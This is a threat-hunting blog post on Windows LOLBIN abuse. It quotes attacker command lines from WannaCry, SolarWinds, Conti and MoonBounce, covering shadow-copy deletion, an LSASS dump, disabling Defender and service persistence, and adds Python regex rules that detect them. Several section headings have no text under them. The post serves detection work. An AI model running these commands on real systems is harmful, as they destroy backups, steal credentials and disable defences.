Why Hunting For LOLBINs Is One Of The Best Bets

Living off the Land — Photo by no one cares on Unsplash

Introduction

You don’t drop things just because they’re old and dusty, you drop them only when they stop working

What do the Numbers Say

TOP 10 Techniques — Red Canary Threat Detection Report
https://trends.google.com/trends/explore?date=today%205-y&q=lolbins

Case Studies

Wannacry (2017)

icacls . /grant Everyone:F /T /C /Q
attrib +h +s <Drive_Letter>:\$RECYCLE
taskkill.exe /f /im sqlserver.exe
taskkill.exe /f /im sqlwriter.exe
taskkill.exe /f /im mysqld.exe
cmd.exe /c start /b @WanaDecryptor@.exe vs
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -q
cscript.exe //nologo <1 character>.vbs

Solarwinds (2020)

wmic /node:[target] process call create "rundll32 c:\windows\[folder]\[beacon].dll [export]"
Invoke-WMIMethod win32_process -name create -argumentlist 'rundll32 c:\Windows\[folder]\[beacon].dll [export]' -ComputerName [target]
rundll32.exe c:\windows\[folder]\[beacon].dll [export]
netsh advfirewall firewall add rule name="[rulename1]" protocol=UDP dir=out localport=137 action=block
schtasks /query /v /s [target] /fo csv
sc \\[target] query type=service state=all
wmic /node:"[target]" service get name,startname
reg add HKLM\system\currentcontrolset\services\[service name] /v Start /t REG_DWORD /d 4

Conti Leak (2021)

whoami /groups
net localgroup administrators
nltest /dclist:[domain]
rundll32.exe C:\windows\System32\comsvcs.dll,MiniDump PID C:\ProgramData\lsass.dmp full
wmic /node: {1} process call create "rundll32.exe C:\ProgramData\2.dll StartW"
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd / c vssadmin list shadows >> c: \log.txt"
powershell Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 / f

Moonbounce (2022)

net start "iscsiwmi"
sc stop iscsiwmi
sc delete iscsiwmi
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "iscsiwmi" /t REG_MULTI_SZ /d "iscsiwmi" /f
sc create "iscsiwmi" binPath= "$system32\svchost.exe -k iscsiwmi" type= share start= auto error= ignore DisplayName= "iscsiwmi"
SC failure "iscsiwmi" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "iscsiwmi" ""iSCSI WMI Classes That Manage Initiators, Ports, Sessions and Connections""
reg add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\iscsiwmi\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "$windir\Microsoft.NET\Framework64\v4.0.30319\System.Mail.Service.dll" /f
net start "iscsiwmi"

Hunting & Detecting LOLBINs Usage

Keeping Up With The Trends

Baseline and AppControl

Log, Collect and Detect
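To show what "log, collect and detect" looks like in practice, here is an added example (not code from the original post) that turns the command lines from the case studies above into hunting rules and runs them over constructed Sysmon-style process-creation events. The sample events, the rule names and the regexes are my own; the rules key on argument shape rather than on the binary, because every one of these LOLBINs also has a legitimate job.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1) as (image, command line);
# the suspicious lines mirror the case studies above, the benign ones are there to test precision.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ("C:\\Windows\\System32\\vssadmin.exe", "vssadmin list shadows"),
    ("C:\\Windows\\System32\\wbem\\WMIC.exe", "wmic shadowcopy delete"),
    ("C:\\Windows\\System32\\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe C:\\windows\\System32\\comsvcs.dll,MiniDump 624 C:\\ProgramData\\lsass.dmp full"),
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("C:\\Windows\\System32\\reg.exe",
     'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters" /v "ServiceDll" '
     '/t REG_EXPAND_SZ /d "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\x.dll" /f'),
    ("C:\\Windows\\System32\\reg.exe", "reg add HKCU\\Software\\ExampleApp /v Start /t REG_DWORD /d 4 /f"),
]

# Hunting rules: (name, case-insensitive regex over the command line, case study it was derived from).
# Patterns key on the argument shape rather than the binary name, since LOLBINs are also used legitimately.
RULES = [
    ("shadow_copy_deletion",
     r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", "WannaCry / Conti"),
    ("boot_recovery_tampering",
     r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
     "WannaCry"),
    ("backup_catalog_deletion", r"wbadmin(\.exe)?\s+delete\s+catalog", "WannaCry"),
    ("lsass_dump_via_comsvcs", r"comsvcs\.dll\s*,\s*MiniDump", "Conti"),
    ("defender_realtime_disabled", r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", "Conti"),
    ("remote_process_via_wmic", r"wmic(\.exe)?\s+/node:.*process\s+call\s+create", "SolarWinds / Conti"),
    ("svchost_servicedll_persistence", r"Services\\[^\\]+\\Parameters.*ServiceDll", "MoonBounce"),
]

def hunt(events):
    """Return one hit per (event, rule) match, keeping the evidence an analyst needs for triage."""
    hits = []
    for image, cmdline in events:
        for name, pattern, source in RULES:
            if re.search(pattern, cmdline, re.IGNORECASE):
                hits.append({"rule": name, "source": source, "image": image, "cmdline": cmdline})
    return hits

def summarize(hits):
    """Count hits per rule, the shape a hunting dashboard would surface first."""
    counts = {}
    for hit in hits:
        counts[hit["rule"]] = counts.get(hit["rule"], 0) + 1
    return counts
```

Run `hunt(SAMPLE_EVENTS)`: the two benign lines (`vssadmin list shadows`, the HKCU `reg add`) produce no hit, while the six lines lifted from the case studies each fire exactly one rule.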

Conclusion

Nasreddine Bencherchali

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.